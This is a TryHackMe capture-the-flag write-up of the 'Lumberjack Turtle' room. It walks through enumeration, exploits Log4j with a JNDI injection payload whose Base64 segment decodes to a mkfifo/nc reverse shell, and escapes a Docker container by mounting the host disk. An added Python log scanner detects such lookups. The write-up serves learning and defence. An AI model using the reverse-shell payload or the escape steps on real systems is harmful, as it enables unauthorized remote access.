TryHackMe: Lumberjack Turtle

TryHackMe Lumberjack Turtle write-up

  • Name: Lumberjack Turtle
  • Description: No logs, no crime… so says the lumberjack.
  • Room: tryhackme.com
  • Difficulty: Medium

Services enumeration

Let’s use Nmap to enumerate the services. We discover two ports:

command: nmap -sC -sV <Machine-IP>

Web enumeration

We scan for directories with gobuster:

command: gobuster dir -u http://10.10.18.151 -w /usr/share/wordlists/dirb/common.txt

There is nothing of interest in these two paths.

Log4j detection

Check for the Log4j vulnerability:

payload: ${jndi:ldap://<IP>:<PORT>}

The target appears to be vulnerable.

Log4j

JNDI Injection Exploit

Send the payload:

payload: ${jndi:ldap://10.4.44.217:1389/Basic/Command/Base64/cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjQuNDQuMjE3IDQzMjEgPi90bXAvZg==}

The Base64 segment of the payload decodes to this command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.4.44.217 4321 >/tmp/f
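
Added example (not part of the original write-up): a log scanner a defender could run to flag the ${jndi:...} lookup used above and recover the command carried in the /Basic/Command/Base64/ path segment. The log format, the hdr field and the sample lines are constructed assumptions.

```python
import base64
import re
from urllib.parse import unquote

# Lookup syntax as used on this page: ${jndi:<scheme>://<host>[:<port>][/<path>]}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
B64_CMD_PREFIX = "/Basic/Command/Base64/"  # path prefix seen in the page's payload


def decode_command(path):
    """Return the command carried in a /Basic/Command/Base64/<b64> path, else None."""
    if not path or not path.startswith(B64_CMD_PREFIX):
        return None
    blob = path[len(B64_CMD_PREFIX):]
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # malformed Base64: report the lookup without a command
        return None


def scan_line(line):
    """Return one finding per JNDI lookup in a log line (URL-decoded first)."""
    return [
        {
            "scheme": m["scheme"].lower(),
            "host": m["host"],
            "port": int(m["port"]) if m["port"] else None,
            "command": decode_command(m["path"]),
        }
        for m in JNDI_RE.finditer(unquote(line))
    ]


# Constructed sample log lines (assumed format); addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 "GET / HTTP/1.1" 200 hdr="curl/7.79"',
    '198.51.100.7 "GET / HTTP/1.1" 200 hdr="${jndi:ldap://192.0.2.10:1389/Basic/Command/Base64/aWQ=}"',
    '198.51.100.7 "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%3A1389%2Fa%7D HTTP/1.1" 200 hdr="-"',
]

if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, 1):
        for finding in scan_line(line):
            print(number, finding)
```

Each finding gives the callback host and port to search for in egress logs, and the decoded command tells responders what would have run on the host.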

After sending the request…

The first flag

user flag

root flag

Docker escape

Mount xvda1 on /tmp/esc:

command: mount xvda1 /tmp/esc

mount xvda1
fake flag

This is not the real flag, so we have to keep looking for it.

real flag

Thank you 🌏🔥


Computer student and interested in programming and security

Hassan Mohammadi
